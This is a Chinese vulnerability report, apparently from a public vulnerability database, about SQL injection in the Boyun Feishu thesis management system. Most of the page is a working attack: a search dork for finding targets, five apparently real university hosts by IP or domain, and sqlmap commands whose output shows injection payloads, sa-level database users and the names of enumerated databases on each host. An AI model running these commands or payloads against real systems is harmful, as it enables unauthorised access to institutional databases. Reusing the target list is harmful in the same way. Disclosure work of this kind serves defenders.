|博云非书论文管理系统存在通用型SQL注入

博云非书论文管理系统存在通用型SQL注入

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：论文管理系统存在通用型SQL注入 ### 详细说明：注入点：dbid和docid 搜索关键字：inurl:/docinfo.action?dbid= [<img src="https://images.seebug.org/upload/201501/14143342fcf43465308f6bc3497cfd0583701857.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/14143342fcf43465308f6bc3497cfd0583701857.png) http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://202.199.163.37/docinfo.action?dbid=72&docid=40619 http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793 http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927 http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517 1）http://202.195.136.150/docinfo.action?dbid=72&docid=40824 sqlmap.py -u "http://202.195.136.150/docinfo.action?dbid=72&docid=40824" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 61 HTTP(s) requ ests: --- Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 9888=9888&docid=40824 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40824 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40824 --- [17:25:15] [INFO] testing MySQL [17:25:32] [WARNING] the back-end DBMS is not MySQL [17:25:32] [INFO] testing Oracle [17:25:49] [WARNING] the back-end DBMS is not Oracle [17:25:49] [INFO] testing PostgreSQL [17:26:06] [WARNING] the back-end DBMS is not PostgreSQL [17:26:06] [INFO] testing Microsoft SQL Server [17:26:23] [INFO] confirming Microsoft SQL Server [17:27:15] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2008 [17:27:15] [INFO] fetching current user [17:27:15] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [17:27:15] [INFO] retrieved: [17:29:12] [INFO] retrieved: [17:29:12] [WARNING] it is very important not to stress the network adapter's ba ndwidth during usage of time-based queries sa current user: 'sa' [17:36:12] [INFO] fetching current database [17:36:12] [INFO] retrieved: [17:38:10] [INFO] retrieved: etd4 current database: 'etd4' [17:50:28] [INFO] fetching database names [17:50:28] [INFO] fetching number of databases [17:50:28] [INFO] retrieved: [17:51:19] [INFO] retrieved: 7 [17:53:44] [INFO] retrieved: [17:55:41] [INFO] retrieved: etd4 [18:07:59] [INFO] retrieved: [18:09:57] [INFO] retrieved: etd4new [18:30:04] [INFO] retrieved: [18:32:01] [INFO] retrieved: idl [18:41:45] [INFO] retrieved: [18:43:44] [INFO] retrieved: master [19:01:04] [INFO] retrieved: [19:03:01] [INFO] retrieved: model [19:18:02] [INFO] retrieved: [19:20:01] [INFO] retrieved: msdb [19:32:17] [INFO] retrieved: [19:34:15] [INFO] retrieved: temp [19:47:23] [ERROR] invalid character detected. retrying.. [19:47:23] [WARNING] increasing time delay to 6 seconds db available databases [7]: [*] etd4 [*] etd4new [*] idl [*] master [*] model [*] msdb [*] tempdb 2）http://202.199.163.37/docinfo.action?dbid=72&docid=40619 sqlmap.py -u "http://202.199.163.37/docinfo.action?dbid=72&docid=40619" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 4908=4908&docid=40619 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40619 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40619 --- [09:45:41] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [09:45:41] [INFO] fetching current user [09:45:41] [INFO] resumed: sa current user: 'sa' [09:45:41] [INFO] fetching current database [09:45:41] [INFO] resumed: etd current database: 'etd' [09:45:41] [INFO] fetching database names [09:45:41] [INFO] fetching number of databases [09:45:41] [INFO] resumed: 5 [09:45:41] [INFO] resumed: etd [09:45:41] [INFO] resumed: master [09:45:41] [INFO] resumed: model [09:45:41] [INFO] resumed: msdb [09:45:41] [INFO] resumed: tempdb available databases [5]: [*] etd [*] master [*] model [*] msdb [*] tempdb 3）http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793 sqlmap.py -u "http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 1458=1458&docid=5793 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=5793 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=5793 --- [13:58:21] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [13:58:21] [INFO] fetching current user [13:58:21] [INFO] resumed: sa current user: 'sa' [13:58:21] [INFO] fetching current database [13:58:21] [INFO] resumed: etd current database: 'etd' [13:58:21] [INFO] fetching database names [13:58:21] [INFO] fetching number of databases [13:58:21] [INFO] resumed: 10 [13:58:21] [INFO] resumed: etd [13:58:21] [INFO] resumed: lunwen [13:58:21] [INFO] resumed: master [13:58:21] [INFO] resumed: model [13:58:21] [INFO] resumed: msdb [13:58:21] [INFO] resumed: ReportServer [13:58:21] [INFO] resumed: ReportServerTempDB [13:58:21] [INFO] resumed: tempdb [13:58:21] [INFO] resumed: test [13:58:21] [INFO] resumed: tsk available databases [10]: [*] etd [*] lunwen [*] master [*] model [*] msdb [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] test [*] tsk 4）http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927 sqlmap.py -u "http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 7461=7461&docid=13927 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=13927 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=13927 --- [11:41:58] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2008 [11:41:58] [INFO] fetching current user [11:41:58] [INFO] resumed: etd current user: 'etd' [11:41:58] [INFO] fetching current database [11:41:58] [INFO] resumed: etd4 current database: 'etd4' [11:41:58] [INFO] fetching database names [11:41:58] [INFO] fetching number of databases [11:41:58] [INFO] resumed: 9 [11:41:58] [INFO] resumed: chek [11:41:58] [INFO] resumed: etd4 [11:41:58] [INFO] resumed: idl30 [11:41:58] [INFO] resumed: master [11:41:58] [INFO] resumed: model [11:41:58] [INFO] resumed: msdb [11:41:58] [INFO] resumed: ReportServer$LIB [11:41:58] [INFO] resumed: ReportServer$LIBTempDB [11:41:58] [INFO] resumed: tempdb available databases [9]: [*] chek [*] etd4 [*] idl30 [*] master [*] model [*] msdb [*] ReportServer$LIB [*] ReportServer$LIBTempDB [*] tempdb 5）http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517 sqlmap.py -u "http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517" -p "dbid" --dbs --current-user --current-db sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: dbid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: dbid=72 AND 1334=1334&docid=62517 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=62517 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=62517 --- [13:59:22] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2005 [13:59:22] [INFO] fetching current user [13:59:22] [INFO] resumed: sa current user: 'sa' [13:59:22] [INFO] fetching current database [13:59:22] [INFO] resumed: etd current database: 'etd' [13:59:22] [INFO] fetching database names [13:59:22] [INFO] fetching number of databases [13:59:22] [INFO] resumed: 7 [13:59:22] [INFO] resumed: etd [13:59:22] [INFO] resumed: idl30 [13:59:22] [INFO] resumed: idl30oooo [13:59:22] [INFO] resumed: master [13:59:22] [INFO] resumed: model [13:59:22] [INFO] resumed: msdb [13:59:22] [INFO] resumed: tempdb available databases [7]: [*] etd [*] idl30 [*] idl30oooo [*] master [*] model [*] msdb [*] tempdb ### 漏洞证明：已证明

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™